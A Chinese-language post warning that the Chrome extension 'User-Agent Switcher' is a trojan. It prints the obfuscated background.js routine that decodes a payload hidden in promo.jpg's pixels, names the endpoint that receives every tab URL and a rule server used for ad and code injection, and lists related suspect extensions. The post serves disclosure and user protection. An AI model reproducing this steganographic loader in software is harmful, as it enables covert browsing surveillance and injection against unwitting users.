Chrome 的插件 User-Agent Switcher 是个木马!
chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...
https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake
为了绕过 chrome 的审核策略,他把恶意代码隐藏在了promo.jpg 里background.js 的第 80 行,从这个图片里解密出恶意代码并执行。
<span>t.prototype.Vh = function(t, e) {
</span><span>if</span><span> (</span><span>""</span><span> === </span><span>'../promo.jpg'</span><span>) </span><span>return</span><span>""</span><span>;
</span><span>void</span><span>0</span><span> === t && (t = </span><span>'../promo.jpg'</span><span>), t.length && (t = r.Wk(t)), e = e || {};
var n = </span><span>this</span><span>.ET,
i = e.mp || n.mp,
o = e.Tv || n.Tv,
h = e.At || n.At,
a = r.Yb(Math.</span><span>pow</span><span>(</span><span>2</span><span>, i)),
f = (e.WC || n.WC, e.TY || n.TY),
u = document.createElement(</span><span>"canvas"</span><span>),
p = u.getContext(</span><span>"2d"</span><span>);
</span><span>if</span><span> (u.style.display = </span><span>"none"</span><span>, u.</span><span>width</span><span> = e.</span><span>width</span><span> || t.</span><span>width</span><span>, u.</span><span>height</span><span> = e.</span><span>width</span><span> || t.</span><span>height</span><span>, </span><span>0</span><span> === u.</span><span>width</span><span> || </span><span>0</span><span> === u.</span><span>height</span><span>) </span><span>
return</span><span>""</span><span>;
e.</span><span>height</span><span> && e.</span><span>width</span><span> ? p.drawImage(t, </span><span>0</span><span>, </span><span>0</span><span>, e.</span><span>width</span><span>, e.</span><span>height</span><span>) : p.drawImage(t, </span><span>0</span><span>, </span><span>0</span><span>);
var c = p.getImageData(</span><span>0</span><span>, </span><span>0</span><span>, u.</span><span>width</span><span>, u.</span><span>height</span><span>),
d = c.data,
g = [];
</span><span>if</span><span> (c.data.every(function(t) {
</span><span>return</span><span>0</span><span> === t
})) </span><span>return</span><span>""</span><span>;
var m, s;
</span><span>if</span><span> (</span><span>1</span><span> === o)
</span><span>for</span><span> (m = </span><span>3</span><span>, s = !</span><span>1</span><span>; !s && m < d.length && !s; m += </span><span>4</span><span>) s = f(d, m, o), s || g.push(d[m] - (</span><span>255</span><span> - a + </span><span>1</span><span>));
var v = </span><span>""</span><span>,
w = </span><span>0</span><span>, y = </span><span>0</span><span>, l = Math.</span><span>pow</span><span>(</span><span>2</span><span>, h) - </span><span>1</span><span>; </span><span>for</span><span> (m = </span><span>0</span><span>; m < g.length; m += </span><span>1</span><span>) w += g[m] << y, y += i, y >= h && (v += </span><span>String</span><span>.fromCharCode(w & l), y %= h, w = g[m] >> i - y); </span><span>return</span><span> v.length < </span><span>13</span><span> ? </span><span>""</span><span> : (</span><span>0</span><span> !== w && (v += </span><span>String</span><span>.fromCharCode(w & l)), v) }</span> <br>
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa
https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg